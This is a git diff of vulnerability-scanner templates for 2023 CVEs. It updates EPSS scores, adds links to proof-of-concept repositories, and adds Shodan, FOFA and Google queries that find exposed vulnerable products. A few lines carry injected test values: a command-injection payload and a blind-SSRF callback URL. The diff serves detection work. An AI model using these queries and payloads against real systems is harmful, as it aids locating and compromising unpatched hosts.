https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10 + - https://github.com/codeb0ss/CVE-2023-39141-PoC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-39141 cwe-id: CWE-22 - epss-score: 0.00437 - epss-percentile: 0.72033 + epss-score: 0.005 + epss-percentile: 0.76302 cpe: cpe:2.3:a:ziahamza:webui-aria2:-:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,8 @@ info: vendor: ziahamza product: webui-aria2 shodan-query: title:"Aria2 WebUI" + fofa-query: title="aria2 webui" + google-query: intitle:"aria2 webui" tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza http: diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 62af18ad92..7c0df7cb84 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39143 cwe-id: CWE-22 - epss-score: 0.93991 - epss-percentile: 0.99092 + epss-score: 0.95367 + epss-percentile: 0.9936 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: papercut product: papercut_mf shodan-query: html:"content=\"PaperCut\"" + fofa-query: body="papercut" tags: cve2023,cve,lfi,papercut http: diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 4711e6a136..5b82e3d346 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3936 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26189 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 46a1d44d1c..8cbd252f43 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39361 cwe-id: CWE-89 - epss-score: 0.13486 - epss-percentile: 0.95109 + epss-score: 0.233 + epss-percentile: 0.9655 cpe: cpe:2.3:a:cacti:cacti:1.2.24:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: cacti product: cacti shodan-query: title:"Login to Cacti" + fofa-query: icon_hash="-1797138069" + google-query: intitle:"cacti" tags: cve2023,cve,cacti,sqli http: diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 81eb0d53a8..33441386ac 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39598 cwe-id: CWE-79 - epss-score: 0.02804 - epss-percentile: 0.90411 + epss-score: 0.05054 + epss-percentile: 0.92885 cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,6 +27,8 @@ info: vendor: icewarp product: webclient shodan-query: title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve2023,cve,xss,icewarp http: diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index af6be74e1c..7b736919f8 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -18,14 +18,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39600 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26117 + epss-score: 0.00071 + epss-percentile: 0.30401 cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: icewarp product: icewarp shodan-query: title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve,cve2023,icewarp,xss http: diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index cbcc8f15ce..61a62b5d5a 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-39676 cwe-id: CWE-79 epss-score: 0.00167 - epss-percentile: 0.53357 + epss-percentile: 0.53401 cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: "true" @@ -27,6 +27,7 @@ info: product: fieldpopupnewsletter framework: prestashop shodan-query: html:"fieldpopupnewsletter" + fofa-query: body="fieldpopupnewsletter" tags: cve2023,cve,prestashop,xss,fieldthemes http: diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index c39e47d90e..d972e97231 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-39677 - epss-score: 0.00632 - epss-percentile: 0.76782 + epss-score: 0.00767 + epss-percentile: 0.81177 cpe: cpe:2.3:a:simpleimportproduct_project:simpleimportproduct:6.2.9:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index 212000700f..b00e4c04a2 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-39700 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41615 + epss-percentile: 0.42039 cpe: cpe:2.3:a:icewarp:mail_server:10.4.5:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: icewarp product: mail_server shodan-query: http.title:"IceWarp Server Administration" + fofa-query: title="icewarp server administration" + google-query: intitle:"icewarp server administration" tags: cve,cve2023,icewarp,xss,unauth http: diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 7992ca201b..7bdeafadf7 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39796 cwe-id: CWE-89 - epss-score: 0.03223 - epss-percentile: 0.90219 + epss-score: 0.05018 + epss-percentile: 0.92857 cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index 6bcd5cd92a..2a4ed4126a 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-40208 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26209 + epss-score: 0.00071 + epss-percentile: 0.30433 cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,9 @@ info: vendor: urosevic product: stock_ticker framework: wordpress + shodan-query: http.html:/wp-content/plugins/stock-ticker/ + fofa-query: body=/wp-content/plugins/stock-ticker/ + publicwww-query: /wp-content/plugins/stock-ticker/ tags: cve2023,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic http: diff --git a/http/cves/2023/CVE-2023-40355.yaml b/http/cves/2023/CVE-2023-40355.yaml index 15ebb9b3ec..4a57276e75 100644 --- a/http/cves/2023/CVE-2023-40355.yaml +++ b/http/cves/2023/CVE-2023-40355.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-40355 cwe-id: CWE-79 epss-score: 0.00587 - epss-percentile: 0.77728 + epss-percentile: 0.78117 cpe: cpe:2.3:a:axigen:axigen_mobile_webmail:*:*:*:*:*:*:*:* metadata: verified: true @@ -23,6 +23,7 @@ info: vendor: axigen product: axigen_mobile_webmail shodan-query: http.favicon.hash:-1247684400 + fofa-query: icon_hash=-1247684400 tags: cve,cve2023,xss,axigen,webmail http: diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index 02e680a862..3148a7c620 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-40779 cwe-id: CWE-601 - epss-score: 0.00869 - epss-percentile: 0.8059 + epss-score: 0.06641 + epss-percentile: 0.93801 cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: icewarp product: deep_castle_g2 shodan-query: title:"IceWarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve2023,cve,icewarp,redirect http: diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index 2c5df20248..e39b936fcd 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4110 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index 16369ce31e..d7d3b8bbb0 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -21,14 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2023-41109 cwe-id: CWE-78 - epss-score: 0.23094 - epss-percentile: 0.96433 - cpe: cpe:2.3:o:patton:smartnode_sn200_firmware:*:*:*:*:*:*:*:* + epss-score: 0.33157 + epss-percentile: 0.97044 + cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: patton - product: smartnode_sn200_firmware + product: smartnode_sn200 tags: cve,cve2023,smartnode,voip,patton variables: payload: "echo CVE-2023-41109 | md5sum" diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index 1404f4d807..9787d55ceb 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4111 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index b11311ac6a..e91ffffb5a 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4112 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.60385 + epss-percentile: 0.61041 cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: phpjabbers product: shuttle_booking_software shodan-query: html:"PHP Jabbers.com" + fofa-query: body="php jabbers.com" tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers http: diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index 4259c76310..01a01ffc9b 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4113 cwe-id: CWE-79 - epss-score: 0.00263 - epss-percentile: 0.63974 + epss-score: 0.0027 + epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index 3e9c7c1f58..1ec0ae73d2 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4114 cwe-id: CWE-79 - epss-score: 0.0039 - epss-percentile: 0.70599 + epss-score: 0.00401 + epss-percentile: 0.73538 cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index dc51e7ef73..6451e653ef 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4115 cwe-id: CWE-79 epss-score: 0.0027 - epss-percentile: 0.67168 + epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index 30a2089b12..babf0a3d96 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4116 cwe-id: CWE-79 epss-score: 0.0027 - epss-percentile: 0.67168 + epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: phpjabbers product: taxi_booking_script shodan-query: html:"PHP Jabbers.com" + fofa-query: body="php jabbers.com" tags: cve,cve2023,packetstorm,xss,phpjabbers http: diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index 19d98c6f12..839f8dab6d 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.9 cve-id: CVE-2023-41265 cwe-id: CWE-444 - epss-score: 0.8352 - epss-percentile: 0.9837 + epss-score: 0.91412 + epss-percentile: 0.98873 cpe: cpe:2.3:a:qlik:qlik_sense:august_2022:-:*:*:enterprise:windows:*:* metadata: max-request: 1 @@ -26,6 +26,8 @@ info: product: qlik_sense framework: windows shodan-query: html:"Qlik" + fofa-query: app="qlik-sense" + google-query: intitle:"qlik-sense" tags: cve2023,cve,kev,qlik,smuggling,windows http: diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 5dfc6e1109..90898a1680 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-41266 cwe-id: CWE-20 - epss-score: 0.83414 - epss-percentile: 0.98363 + epss-score: 0.86555 + epss-percentile: 0.98585 cpe: cpe:2.3:a:qlik:qlik_sense:august_2022:-:*:*:enterprise:windows:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: qlik_sense framework: windows shodan-query: http.favicon.hash:-74348711 + fofa-query: app="qlik-sense" + google-query: intitle:"qlik-sense" tags: cve2023,cve,qlik,traversal,kev,windows http: diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index d0825f4029..0ddb1394a8 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4148 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26209 + epss-score: 0.00071 + epss-percentile: 0.30433 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: metaphorcreations product: ditty framework: wordpress + shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/ + fofa-query: body=/wp-content/plugins/ditty-news-ticker/ publicwww-query: /wp-content/plugins/ditty-news-ticker/ tags: cve2023,cve,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 7779956df0..1c0bbed02a 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -9,13 +9,16 @@ info: reference: - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0 - https://nvd.nist.gov/vuln/detail/CVE-2023-41538 + - https://github.com/2lambda123/Windows10Exploits + - https://github.com/codeb0ss/CVE-2023-41538-PoC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-41538 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.4345 + epss-score: 0.00106 + epss-percentile: 0.43265 cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index 2fc3ac93a3..bfab310376 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-41642 cwe-id: CWE-79 - epss-score: 0.00062 - epss-percentile: 0.24611 + epss-score: 0.00069 + epss-percentile: 0.29886 cpe: cpe:2.3:a:grupposcai:realgimm:1.1.37:p38:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index fc4b94187b..35ee14c414 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4168 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.12454 - epss-percentile: 0.95296 + epss-score: 0.09433 + epss-percentile: 0.94715 cpe: cpe:2.3:a:templatecookie:adlisting:2.14.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index ee8a50c97c..84fe4bb11e 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -17,13 +17,14 @@ info: cvss-score: 8.8 cve-id: CVE-2023-4169 cwe-id: CWE-284,NVD-CWE-noinfo - epss-score: 0.00938 - epss-percentile: 0.82702 + epss-score: 0.0131 + epss-percentile: 0.85907 cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijie product: rg-ew1200g_firmware + shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve,cve2023,ruijie,router,intrusive variables: diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 75913b4766..2221179ef9 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -21,14 +21,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4173 cwe-id: CWE-79 - epss-score: 0.00226 - epss-percentile: 0.60816 + epss-score: 0.00189 + epss-percentile: 0.56249 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moostore + shodan-query: http.favicon.hash:"702863115" fofa-query: mooSocial tags: cve2023,cve,packetstorm,moosocial,xss diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 23a28e5c27..5a7b1fe0c4 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -21,14 +21,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4174 cwe-id: CWE-79 - epss-score: 0.00352 - epss-percentile: 0.71356 + epss-score: 0.00302 + epss-percentile: 0.69562 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: moosocial product: moostore + shodan-query: http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" tags: cve,cve2023,packetstorm,moosocial,xss diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index d4de9d38ba..5574d98b8e 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-41763 - epss-score: 0.05631 - epss-percentile: 0.93128 + epss-score: 0.04783 + epss-percentile: 0.92691 cpe: cpe:2.3:a:microsoft:skype_for_business_server:2015:cumulative_update_13:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: microsoft product: skype_for_business_server shodan-query: html:"Skype for Business" + fofa-query: body="skype for business" tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev variables: ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//" diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 188fc5cdc2..6d4426101b 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-41892 cwe-id: CWE-94 - epss-score: 0.87963 - epss-percentile: 0.98425 + epss-score: 0.8421 + epss-percentile: 0.98494 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: craftcms product: craft_cms shodan-query: http.favicon.hash:-47932290 + fofa-query: icon_hash=-47932290 publicwww-query: "craftcms" tags: cve2023,cve,rce,unauth,craftcms diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 48301c8e50..196442230c 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -12,13 +12,15 @@ info: - https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/api/session/session.py#L91 - https://nvd.nist.gov/vuln/detail/CVE-2023-42442 - https://github.com/jumpserver/jumpserver/commit/0a58bba59cd275bab8e0ae58bf4b359fbc5eb74a + - https://github.com/Marco-zcl/POC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-42442 cwe-id: CWE-287 - epss-score: 0.09144 - epss-percentile: 0.94063 + epss-score: 0.79196 + epss-percentile: 0.98277 cpe: cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 2a7e94274f..97ed5429c7 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-42793 cwe-id: CWE-288 - epss-score: 0.97093 - epss-percentile: 0.99759 + epss-score: 0.97094 + epss-percentile: 0.99777 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: product: teamcity shodan-query: title:TeamCity fofa-query: title=TeamCity + google-query: intitle:teamcity tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev http: diff --git a/http/cves/2023/CVE-2023-43177.yaml b/http/cves/2023/CVE-2023-43177.yaml index 4b7c96efa1..9002704bfb 100644 --- a/http/cves/2023/CVE-2023-43177.yaml +++ b/http/cves/2023/CVE-2023-43177.yaml @@ -17,13 +17,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43177 cwe-id: CWE-913 - epss-score: 0.92767 - epss-percentile: 0.98966 + epss-score: 0.96402 + epss-percentile: 0.99567 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: crushftp product: crushftp + shodan-query: http.html:"crushftp" + fofa-query: body="crushftp" tags: cve,cve2023,crushftp,unauth,rce,intrusive flow: http(1) && http(2) && http(3) diff --git a/http/cves/2023/CVE-2023-43187.yaml b/http/cves/2023/CVE-2023-43187.yaml index b8a0294b5d..9af87f47a0 100644 --- a/http/cves/2023/CVE-2023-43187.yaml +++ b/http/cves/2023/CVE-2023-43187.yaml @@ -14,13 +14,14 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43187 cwe-id: CWE-91 - epss-score: 0.09598 - epss-percentile: 0.94633 + epss-score: 0.2535 + epss-percentile: 0.96685 cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: nodebb product: nodebb + shodan-query: cpe:"cpe:2.3:a:nodebb:nodebb" fofa-query: "title=\"nodebb\"" tags: cve,cve2023,nodebb,rce flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index b840e7cc68..98b9918453 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -16,14 +16,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-43208 - epss-score: 0.00349 - epss-percentile: 0.71422 + epss-score: 0.96306 + epss-percentile: 0.99539 cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:* metadata: vendor: nextgen product: mirth_connect shodan-query: title:"mirth connect administrator" - tags: cve,cve2023,nextgen,rce + fofa-query: title="mirth connect administrator" + google-query: intitle:"mirth connect administrator" + tags: packetstorm,cve,cve2023,nextgen,rce,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index 860d4d386e..d3499af1d8 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -17,14 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2023-43261 cwe-id: CWE-532 - epss-score: 0.00476 - epss-percentile: 0.73134 - cpe: cpe:2.3:o:milesight:ur5x_firmware:*:*:*:*:*:*:*:* + epss-score: 0.00565 + epss-percentile: 0.77715 + cpe: cpe:2.3:h:milesight:ur51:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: milesight - product: ur5x_firmware + product: ur51 shodan-query: http.html:rt_title tags: cve2023,cve,router,milesight,disclosure,unauth,iot diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index 8cffbf64dc..732dc80970 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -17,14 +17,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-43325 cwe-id: CWE-79 - epss-score: 0.37241 - epss-percentile: 0.97089 + epss-score: 0.18316 + epss-percentile: 0.96187 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve2023,cve,xss,moosocial http: diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index ee7185587d..6f785e9c29 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -16,14 +16,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-43326 cwe-id: CWE-79 - epss-score: 0.00643 - epss-percentile: 0.78809 + epss-score: 0.00666 + epss-percentile: 0.79657 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve2023,cve,xss,moosocial http: diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 1b20ba9e04..49692b3e4c 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43374 cwe-id: CWE-89 - epss-score: 0.00076 - epss-percentile: 0.31944 + epss-score: 0.00735 + 